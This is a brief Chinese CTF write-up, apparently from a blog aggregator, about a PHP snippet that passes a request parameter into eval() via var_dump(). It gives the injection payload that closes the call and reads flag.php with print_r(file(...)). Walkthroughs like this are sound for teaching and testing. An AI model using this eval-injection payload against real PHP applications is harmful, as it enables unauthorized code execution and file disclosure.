<?php
include "flag.php";
$a = @$_REQUEST['hello'];//a从get、post获取hello值。
eval( "var_dump($a);"); //var_dump()打印显示,eval()闭合这个程序
show_source(__FILE__); //该段不解析作为一个字符串原样输出
?>
现在我们要使flag.php执行并通过show_source(__FILE__);显示
针对var_dump()进行操作 首先将他闭合
hello=);
然后我们要执行flag.php 用print_r()打印字符串本身 file()读取文件内容
hello=);print_r(file("./flag.php")
最后
以上就是执着期待最近收集整理的关于ctf、本地包含、例1的全部内容,更多相关ctf、本地包含、例1内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复